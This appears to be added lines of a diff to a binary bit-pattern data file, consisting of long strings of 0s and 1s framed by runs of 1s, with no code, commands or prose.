+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000110101011000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000001000110101001010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000001000111000001011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000001000110100111011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001000110101010111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 